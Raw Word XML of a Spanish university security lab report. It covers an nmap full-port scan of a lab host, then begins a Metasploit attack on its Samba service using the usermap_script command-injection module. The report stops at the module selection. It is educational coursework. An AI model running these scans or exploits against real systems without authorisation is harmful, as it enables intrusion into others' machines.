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BF" w:rsidRPr="006672BF" w:rsidRDefault="00F71221" w:rsidP="006672BF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBd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45642059"/>
          <w:docPartObj>
            <w:docPartGallery w:val="Cover Pages"/>
            <w:docPartUnique/>
          </w:docPartObj>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/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F42623A" wp14:editId="70BF1C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672BF" w:rsidRDefault="00630722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6672BF" w:rsidRDefault="006672B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672BF" w:rsidRDefault="006672BF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72BF" w:rsidRDefault="00C0134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SEGURIDAD INFORMÁ</w:t>
                                      </w:r>
                                      <w:r w:rsidR="006672BF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T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72BF" w:rsidRDefault="006672BF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Práctica 1</w:t>
                                      </w:r>
                                      <w:r w:rsidR="00630722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(Parte extra pág. 8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72BF" w:rsidRDefault="006672BF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Jorge Andrés Galindo - 679155</w:t>
                                      </w:r>
                                    </w:p>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:p w:rsidR="006672BF" w:rsidRDefault="006672B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Javier Aranda García - 6791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672BF" w:rsidRDefault="00630722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6672BF" w:rsidRDefault="006672B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672BF" w:rsidRDefault="006672BF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672BF" w:rsidRDefault="00C0134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SEGURIDAD INFORMÁ</w:t>
                                </w:r>
                                <w:r w:rsidR="006672BF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T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672BF" w:rsidRDefault="006672BF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Práctica 1</w:t>
                                </w:r>
                                <w:r w:rsidR="00630722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(Parte extra pág. 8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672BF" w:rsidRDefault="006672BF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Jorge Andrés Galindo - 679155</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w:rsidR="006672BF" w:rsidRDefault="006672B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Javier Aranda García - 679184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6672BF" w:rsidRPr="006672BF">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Parte I: Descubrimiento de servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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En primer lugar, se ha buscado información en internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="00D06657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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D06657">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A94D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</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>saber previamente que hace</w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> antes de utilizarla a lo l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">argo de la práctica. Gracias a </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>su página oficial, descubrimos que se trataba de un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a herramienta de código abierto</w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para la exploración de red y auditoría de seguridad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. El mecanismo que sigue dicha </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>herramienta es el envío de paquetes IP para deter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">minar que equipos se encuentran </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">disponibles en una red, además de otras informaciones cómo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">que sistema operativo utilizan, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qué tipos de filtros de paquetes...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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La herramienta "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">" ofrece como salida un listado de los objetivos analizados, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>junto</w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4"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>con una serie de información de dichos objetivos, dependiendo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las opciones seleccionadas. </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>De toda la información obtenida, una de la más importante es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> la obtenida del puerto de cada </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>uno de los servicios analizados. Dicha tabla de puertos indica, m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ediante cuatros estados, el </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>modo en el que se encuentra el puerto en el momento del aná</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">lisis (open, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>close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ltered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6672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>unfiltered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94DA4" w:rsidRP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Una vez obtenida y entendida la información que se podía o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">btener con la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="00D06657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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D0665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Pr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>proseguimos con la ejecución del siguiente comando en la máquina "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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19400" cy="2762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6672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>nmap</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> -p 1-65535 -T4 -A -v 192.168.10.11</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006672BF" w:rsidRDefault="00667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margin-left:0;margin-top:0;width:222pt;height:21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">
                <v:textbox>
                  <w:txbxContent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6672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>nmap</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> -p 1-65535 -T4 -A -v 192.168.10.11</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006672BF" w:rsidRDefault="006672B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A94DA4" w:rsidRDefault="00A94DA4" w:rsidP="00A94DA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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Las opciones del comando hacen lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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48250" cy="1514475"/>
                <wp:effectExtent l="0" t="0" r="1905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-p: indica el intervalo de puertos del objetivo a analizar (1-65535).</w:t>
                            </w:r>
                          </w:p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-T: selecciona la plantilla de temporizado (4 es de los más rápidos).</w:t>
                            </w:r>
                          </w:p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-A: habilita la detección del sistema operativo y versión.</w:t>
                            </w:r>
                          </w:p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-v: aumenta el nivel de mensajes detallados en la salida.</w:t>
                            </w:r>
                          </w:p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192.168.10.11: dirección del objetivo a analizar.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006672BF" w:rsidRDefault="00667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0;width:397.5pt;height:119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">
                <v:textbox>
                  <w:txbxContent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-p: indica el intervalo de puertos del objetivo a analizar (1-65535).</w:t>
                      </w:r>
                    </w:p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-T: selecciona la plantilla de temporizado (4 es de los más rápidos).</w:t>
                      </w:r>
                    </w:p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-A: habilita la detección del sistema operativo y versión.</w:t>
                      </w:r>
                    </w:p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-v: aumenta el nivel de mensajes detallados en la salida.</w:t>
                      </w:r>
                    </w:p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192.168.10.11: dirección del objetivo a analizar.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF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lastRenderedPageBreak/>
        <w:t>Como resultado de la ejecución del comando (tras unos minut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">os analizando los puertos), se </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">obtiene que la máquina a analizar tiene cerrados 65505 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">puertos del total analizado. De </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>aquellos marcados como no cerrados, se obtiene información conformada por el número, el esta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>del mismo, el servicio en curso, la versión y una breve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> descripción del servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94DA4" w:rsidRPr="00A94DA4" w:rsidRDefault="00A94DA4" w:rsidP="00A94DA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94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inicio de la ejecución del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="00106DA0" w:rsidP="00106D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2E9F403D" wp14:editId="2E702ABE">
            <wp:extent cx="3703319" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Imagen 15" descr="C:\Users\Jorge\Documents\Jorge\Uni\Seguridad\practica1\n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Jorge\Uni\Seguridad\practica1\nma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89" cy="254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0" w:rsidRPr="00A94DA4" w:rsidRDefault="00A94DA4" w:rsidP="00A94DA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94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Algunos de los resultados obtenidos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00A94DA4" w:rsidP="00106D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78F1FBB3" wp14:editId="7651F1E4">
            <wp:extent cx="3689365" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="18" name="Imagen 18" descr="C:\Users\Jorge\Documents\Jorge\Uni\Seguridad\practica1\nma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ocuments\Jorge\Uni\Seguridad\practica1\nma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77" cy="28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BF" w:rsidRDefault="006672BF" w:rsidP="00106DA0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00106DA0" w:rsidRPr="006672BF" w:rsidRDefault="00106DA0" w:rsidP="00106DA0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00106DA0" w:rsidRDefault="00106DA0" w:rsidP="006D64E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00106DA0" w:rsidRDefault="00106DA0" w:rsidP="006D64E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00106DA0" w:rsidRDefault="00106DA0" w:rsidP="006D64E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF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6672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parte II: Inyección remota de comandos en el sistema de ficheros remotos Samba.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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En primer lugar, para realizar esta segunda parte de la práct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ica, se buscó información sobre </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>la herramienta "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework" para saber qué íbamos a u</w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">tilizar. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework" </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">es un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>subproyecto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">”, cuya función principal es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">desarrollar y ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>contra una máquina remota. La nueva herramienta se va a utiliz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r w:rsidR="000D42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esta parte de la práctica</w:t>
      </w:r>
      <w:r w:rsidR="000D42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 xml:space="preserve">para explotar y penetrar en las vulnerabilidades del objetivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">analizado en el </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>punto anterior. La herramienta funciona a base de módulos, cada un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o de ellos aprovechan distintas </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>vulnerabilidades en diferentes servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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A continuación, realizamos, mediante el comando "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> samb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a", una búsqueda de los módulos </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">disponibles para explotar distintas vulnerabilidades. El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">resultado de la búsqueda fue un </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>listado de tod</w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>os los módulos, junto con un</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ranking y una </w:t>
      </w:r>
      <w:r w:rsidR="00A94DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006672B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cripción. De todos los módulos, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>elegimos el "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>" (inyección remota de comandos) con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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95675" cy="333375"/>
                <wp:effectExtent l="0" t="0" r="2857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672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>use</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00667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exploit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="006672BF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multi</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>/samba/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usermap_script</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w:rsidR="006672BF" w:rsidRDefault="00667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0;width:275.25pt;height:26.2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">
                <v:textbox>
                  <w:txbxContent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6672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>use</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="006672B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exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672BF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multi</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>/samba/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usermap_script</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
